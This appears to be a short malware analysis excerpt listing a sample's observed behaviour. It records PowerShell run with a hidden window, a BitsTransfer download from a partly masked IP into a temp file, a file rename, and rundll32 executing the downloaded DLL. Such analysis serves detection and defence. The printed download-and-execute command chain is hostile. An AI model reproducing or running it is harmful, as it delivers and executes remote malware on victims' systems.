Technical Information
- <SYSTEM32>\windowspowershell\v1.0\powershell.exe
- %TEMP%\bit167.tmp
- %TEMP%\bit167.tmp
- from %TEMP%\bit167.tmp to %TEMP%\25ywfhdd.l4l
- '18#.#9.69.41':80
- http://18#.#9.69.41/data/e3d71725d748b5b230fceb26c49021cc
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://18#.#9.69.41/data/e3d71725d748b5b230f...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile
- '<SYSTEM32>\rundll32.exe' %TEMP%\25ywfhdd.l4l,Start